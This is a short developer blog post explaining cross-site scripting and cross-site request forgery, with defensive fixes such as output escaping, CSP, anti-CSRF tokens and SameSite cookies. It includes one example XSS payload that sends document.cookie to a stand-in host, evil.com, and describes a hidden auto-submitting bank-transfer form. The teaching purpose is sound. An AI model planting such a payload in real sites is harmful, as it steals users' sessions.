The Two Bugs That Kill Startups: A Deep Dive into XSS and CSRF

The Two Bugs That Kill Startups: A Deep Dive into XSS and CSRF

# csrf# security
The Two Bugs That Kill Startups: A Deep Dive into XSS and CSRFFrank Oge

You can have the cleanest React code, the fastest API, and the most beautiful UI. But if I can inject...

You can have the cleanest React code, the fastest API, and the most beautiful UI. But if I can inject a script into your search bar that steals your users' session cookies, your startup is dead.
​Security is not an "add-on." It is a fundamental requirement.
Today, we are breaking down the two most common web vulnerabilities: Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF).
​1. Cross-Site Scripting (XSS)
​The Concept:
XSS happens when an attacker tricks your website into executing their JavaScript.
Imagine a comment section.
User A posts a comment: Great article!
User B (Attacker) posts: fetch(&#39;<a href="http://evil.com?cookie=">http://evil.com?cookie=</a>&#39; + document.cookie)
​If your website renders that comment as raw HTML, the browser sees the tag and executes it. The attacker now has the session cookie of everyone who viewed the comment.<br> ​The Fix:<br> ​Sanitize Input: Never trust user data. Strip out <script> tags.<br> ​Escape Output: Modern frameworks like React and Vue do this automatically. They convert &lt; to &lt;. If you use dangerouslySetInnerHTML in React, you are opening the door to XSS.<br> ​Content Security Policy (CSP): A server header that tells the browser: &quot;Only run scripts from my domain.&quot;<br> ​2. Cross-Site Request Forgery (CSRF)<br> ​The Concept:<br> CSRF is about tricking a logged-in user into performing an action they didn&#39;t intend to.<br> ​Scenario:<br> ​You are logged into your bank (bank.com). Your session cookie is stored in the browser.<br> ​You visit a malicious site (free-iphone.com).<br> ​That site has a hidden form that auto-submits a POST request to bank.com/transfer?amount=1000&amp;to=Attacker.<br> ​Because your browser automatically sends cookies with every request to bank.com, the bank thinks you made the request.<br> ​The Fix:<br> ​Anti-CSRF Tokens: The server generates a random token (e.g., abc12345) and embeds it in the HTML form. When the form is submitted, the server checks if the token matches. The attacker&#39;s site cannot read this token because of the &quot;Same-Origin Policy.&quot;<br> ​SameSite Cookie Attribute: Set your cookies to SameSite=Strict or Lax. This tells the browser: &quot;Do not send this cookie if the request comes from a different website.&quot;<br> ​Conclusion<br> ​These vulnerabilities are old, but they are still prevalent. As a developer, your job is to assume every input is malicious and every request is suspicious until proven otherwise.</p> <p>​Hi, I&#39;m Frank Oge. I build high-performance software and write about the tech that powers it. If you enjoyed this, check out more of my work at frankoge.com</p>